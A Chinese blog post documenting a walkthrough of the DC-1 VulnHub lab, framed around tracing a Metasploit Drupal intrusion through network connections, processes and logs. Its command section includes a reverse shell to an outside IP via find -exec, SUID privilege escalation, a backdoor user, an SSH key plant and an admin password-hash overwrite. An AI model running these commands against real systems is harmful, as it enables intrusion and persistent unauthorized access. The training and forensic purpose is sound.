DC1 靶场通关及溯源分析

原创 已于 2025-10-28 21:17:14 修改 · 725 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#adb #android

于 2025-10-28 15:29:24 首次发布

DC1靶场通关已经有很多人写过了,这次写的角度主要是从溯源的角度来写。

主要从网络连接、进程和日志的角度来分析msf攻击前后靶机的状态,密码我用hydra爆破成功了。

一、DC1靶机情况

在预先知道用户名和密码的情况下,查看网络连接,未发现特殊情况。

输入ps aux,查看进程情况

发现 进程id3387,有一个find提权操作,这是因为flag4账号权限过低,为了方便查看进程情况,对flag4进行了提权。

记住图片的信息,接下来我们使用msf入侵系统,看看有哪些变化

二、使用msf进行侵入

  1. 使用nmap扫描靶机,发现开放了22、80和111端口,其中80端口显示未drupal,版本为7.0。
  2. 进入msf后,输入search drupal,选择载荷2,use 2;
  3. 配置好远程ip,run,发现直接建立了会话。
  4. 进入dc1,查看网络连接,发现dc1的59148端口连接了攻击机的4444端口;
  5. 查看进程信息,发现有两个php脚本进程,此为异常进程。

    6.查看apache日志,tail -n 100 /var/log/apache2/access.log

    对访问的url进行解码(hex转字符),可以看到解密后的代码如下,里面有回连ip和端口信息。

    三、查找flag

    1. 输入shell,python -c "import pty;pty.spawn('/bin/bash')";获得一个交互式的脚本
    2. 输入ls,看到有个flag1,根据flag1的提示,可以很快找到site目录下有个数据库配置文件,找到后里面有个flag2

    3.根据flag2的提示,知道flag3,要登录获取网站管理员的账号,同时我们得到了网站的数据库用户名和密码

    $databases = array (
      'default' => 
      array (
        'default' => 
        array (
          'database' => 'drupaldb',
          'username' => 'dbuser',
          'password' => 'R0ck3t',
          'host' => 'localhost',
          'port' => '',
          'driver' => 'mysql',
          'prefix' => '',
        ),
      ),
    );
     

    4.mysql -u dbuser -p  -h 127.0.0.1 -P 3306 接入后,发现密码被加密了,通常加密算法会在网站源码中找到,果然在这里./scripts/password-hash.sh ,直接输入./scripts/password-hash.sh  123456得到,$S$DNy8pxQgm0j7Ae7QJA4R97j7e5ht0g5zr36IwUpa2W6hqX97xPFd

    5.再次登录数据库后,替换密码哈希值。UPDATE users SET pass = '$S$DNy8pxQgm0j7Ae7QJA4R97j7e5ht0g5zr36IwUpa2W6hqX97xPFd' WHERE name = 'admin';

    6.进入系统后,随便点点,得到flag3.

    7.再次查看进程信息,可以发现www-data用户连接了mysql,但其实这个进程不是www-data启动的,结合最开始的进程情况,可以发现这是一个新的进程。

    8.根据flag3,可以知道flag4和finalflag

    8.最后,因为dc1的ssh端口开放,可以尝试hydra爆破一下,这个爆破肯定会在/var/log/auth.log留下记录

    四、主要命令

    这里放了一些命令,方便大家复制粘贴,尝试过写公钥,不过很难成功,不知道原因是什么,sshd的配置也改过,有成功的大神希望告知一下原因。


    python -c "import pty;pty.spawn('/bin/bash')"

    find / -exec /bin/sh \;

    find / -perm -u=s -type f 2>/dev/null

    /usr/sbin/useradd -m  -s /bin/bash gu
    passwd gu

    find / -exec /bin/bash -i >& /dev/tcp/192.168.136.167/5555 0>&1 \;
    mkdir -p /home/flag4/.ssh 
    chmod 700 /home/flag4/.ssh 
    chown root:root /home/flag4/.ssh

    touch /home/flag4/.ssh/authorized_keys 
    chmod 600 /home/flag4/.ssh/authorized_keys 
    chown root:root /home/root/.ssh/authorized_keys

    echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCNaT42/sJ4F1irbQzB7wbg3FRf/0ZvPu0pZkBQuw48usJ0K4tor/DXpXjpxOPSy36igy0T8BPA5LGQILZsNIHASmdQmbzzayRpFBm69RmxdAyEZRrVQgX4dR5tf4Dsy8WCYU3++uXZivxqZrYTf0YiTuNyCsKpubcEPf5XUFZ7lVRTHYddC4dQnAVaEB63TouOGopZbZUrMJ2+6DnkKoyliVKNAe9DjyfR/yfJOaDqaaZbpVF2s++e601J9cgvBSoW6S38W/cn6tE9N3W3+xI2Gm/SpOx6A/0PJYE+/4JcGWGR3ik5nPKNCxj3ZZ/+ult5MdQRsZc/TtlQZ9eRqrgD rsa-key-20251027 >> /home/flag4/.ssh/authorized_keys

    mysql -u dbuser -p  -h 127.0.0.1 -P 3306
    ./scripts/password-hash.sh 123456


    UPDATE users SET pass = '$S$DNy8pxQgm0j7Ae7QJA4R97j7e5ht0g5zr36IwUpa2W6hqX97xPFd' WHERE name = 'admin';

    cp /home/flag4/authorized_keys  /home/flag4/.ssh/authorized_keys

    /etc/init.d/sshd restart

    ps aux
    netstat -anp

    靶场练习 手把手教你通关DC系列 DC1
    QYbkx974的博客
    07-09 1912
    本次使用的kali机的IP地址为DC1的地址为靶场IP地址为: 192.168.243.134开放端口: 22/ssh 80/http 111/rpcbind框架: cms Drupal 7中间件: Apache 2.2.22语言: php 5.4.45操作系统: Debian。
    DC1靶场 Drupal
    m0_62438849的博客
    03-02 1411
    22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
    DC靶场系列-DC1靶场-渗透测试靶场
    03-09
    DC靶场系列-DC1靶场-渗透测试靶场 仅限于练习使用!!!
    靶场 DC-1 通关详解
    2401_83566113的博客
    09-14 2060
    在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.​ SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。
    [ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
    热门推荐
    qq_51577576的博客
    03-14 1万+
    [ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
    DC-1靶场通关详解
    qq_30889301的博客
    05-20 489
    dc-1入门教程
    【vulnhub靶场DC1通关介绍】
    qq_55213436的博客
    07-09 1038
    吾日三省吾身:学到了什么?不会什么?能干什么?额:学了啥?都不会?能干饭?哈哈哈哈!又到了检验学习成果的时候了,这不得拿拿著名的vulnhub网站上面的靶场来试试手,首选经典的DC系列;话不多说,就搞dc1。......
    Vulnhub系列之DC1靶场详解
    weixin_50053818的博客
    05-04 3926
    文章目录环境drupal 7.x漏洞拿flag1在目录中找配置文件拿flag2改密码进网站拿flag2ssh爆破拿flag4提权拿最后的flag 环境 DC-1靶场 VMware虚拟机 kali drupal 7.x漏洞拿flag1 首先搭建好靶场。这次一次黑盒靶场测试,只能从虚拟机中查看DC1靶场的mac地址,从而查出目标靶机的IP。 所以目标IP地址为192.168.31.184,直接上nmap进行目标全面扫描。 由nmap扫描可以知道,目标靶机开放了22,80,111,42875端口,看到端
    DC-1靶机通关教学(DC靶场系列)
    qq_73413340的博客
    08-26 1269
    好吧,就只有一个flag文件,根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的不过知道名字叫settings.php,我们可以用命令直接搜索并打开,内联执行
    VulnHub之dc1靶场(3)
    p_utao的博客
    02-20 270
    靶场信息: 地址:https://www.vulnhub.com/entry/dc-1-1,292/ 难度:简单 目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志 运行:vm work 信息收集 nmap直接扫描网段存活主机 扫描常见端口 nmap 10.7.10.29 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 EST Nmap scan report for 10.7.10.29 Host is u
    DC靶场系列--DC1
    BGiscool的博客
    06-28 6123
    DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
    MySQL输入密码后闪退?
    2509_94010268的博客
    11-21 418
    在服务列表中,找到以“MySQL”开头的服务(例如,MySQL、MySQL56、MySQL57、MySQL80等,具体名称取决于你的MySQL版本和安装方式)。有时候,default-character-set=gbk这样的设置可能会导致问题,你可以尝试将其注释掉或删除,然后重启MySQL服务。②修改SQL语法:如果你不想改变MySQL的版本,那么你可以尝试修改SQL查询语句,确保它们符合目标MySQL服务器的语法要求。如果MySQL服务已启动并且你输入了正确的密码,你应该能够成功连接到MySQL服务器。
    mysql的主从配置
    2509_94006444的博客
    11-24 761
    MySQL 主从又叫做 Replication、AB 复制。简单讲就是 A 和 B 两台机器做主从后,在 A 上写数据,另外一台 B 也会跟着写数据,两者数据实时同步的。MySQL 主从是基于 binlog 的,主上须开启 binlog 才能进行主从。主从过程大致有 3 个步骤:1)主将更改操作记录到 binlog 里2)从将主的 binlog 事件(sql 语句)同步到从本机上并记录在 relaylog里中继日志3)从根据 relaylog 里面的 sql 语句按顺序执行。
    mysql 迁移达梦数据库出现的 sql 语法问题 以及迁移方案
    2509_94010201的博客
    11-24 586
    Copy CodeMySQL: DATE_FORMAT( a.expiry_date, ‘%Y-%m-%d %H:%M:%S’ ) 达梦: TO_CHAR(a.expiry_date, ‘YYYY-MM-DD HH24:MI:SS’)MySQL: DATE_FORMAT( a.expiry_date, ‘%Y-%m-%d %H:%M:%S’ ) 达梦: TO_CHAR(a.expiry_date, ‘YYYY-MM-DD HH24:MI:SS’)另外,在某些函数和操作符的使用上也有一些差异。
    MySQL 远程登录实验:通过 IP 地址跨机器连接实战指南
    2301_79807099的博客
    11-22 747
    本次实验通过 “服务器端配置(用户授权 + 端口放行 + 监听配置)→ 客户端连接 → 功能验证” 的流程,成功实现了 MySQL IP 地址远程登录。远程用户的Host需精准匹配客户端 IP(或用允许所有 IP,适合测试场景);防火墙放行 3306 端口是跨机器连接的前提;强密码策略和最小权限授权是远程登录的安全基础。
    【MySQL数据库】Ubuntu下的mysql
    2509_94083135的博客
    11-22 665
    所谓安装数据库服务器,只是在机器上安装了一个数据库管理系统程序,这个管理程序可以管理多个用户建立的数据库,一般开发人员会针对每一个应用创建一个数据库,而为保存应用中实体的数据,一般会在数据库中创建多个表结构,以保存程序中实体的数据。输入“ help ” 或 “ h ” 获取MYSQL基础命令帮助,例如:clear清除当前输入的指令,quit退出mysql等。:这是MySQL服务器的主要配置段,大部分与服务相关的设置都在这里,包括数据存储路径、缓冲池大小、线程数、日志设置等。在Ubuntu系统下,使用。
    MuMu模拟器,配置ADB端口
    最新发布
    m0_73104820的博客
    11-24 127
    这个命令是连接某个设备,如使用MuMu模拟器,输入。
    MySQL数据库误删恢复_mysql 数据 误删
    2509_94004335的博客
    11-24 602
    server-id是 MySQL 数据库中的一条配置参数,用于设置 MySQL 实例的唯一 ID。在导航{3.6.5、恢复表} 我们执行的语句mysqlbinlog --start-position=720 --stop-position=1579 mysql-bin.000001 | mysql -uroot -p, 事件开始位置720 ,事件结束位置1579,说明我们位置不对呗,这个位置只能恢复表不能恢复数据。-p为密码,如果设置了密码,可直接在-p后链接输入,如:-proot;为什么 往下继续↓↓。
    MySQL JSON数据类型全解析(JSON datatype and functions)
    2509_94004335的博客
    11-24 697
    JSON(JavaScript Object Notation)是一种常见的信息交换格式,其简单易读且非常适合程序处理。MySQL从5.7版本开始支持JSON数据类型,本文对MySQL中JSON数据类型的使用进行一个总结。在MySQL中,JSON数据是以字符串形式表现的,但是它有自己的解析规则,利用某些途径可以将字符串转换为JSON类型数据,这个过程叫做规范化(normalization),在规范化过程中,MySQL会对数据格式进行验证,若字符串不是有效的JSON格式,那么就会报错。
    评论
    成就一亿技术人!
    拼手气红包6.0元
    还能输入1000个字符
     
    红包 添加红包
    表情包 插入表情
    表情包 代码片
     条评论被折叠 查看
    添加红包

    请填写红包祝福语或标题

    红包个数最小为10个

    红包金额最低5元

    当前余额3.43前往充值 >
    需支付:10.00
    成就一亿技术人!
    领取后你会自动成为博主和红包主的粉丝 规则
    hope_wisdom
    发出的红包
    实付
    使用余额支付
    点击重新获取
    扫码支付
    钱包余额 0

    抵扣说明:

    1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
    2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

    余额充值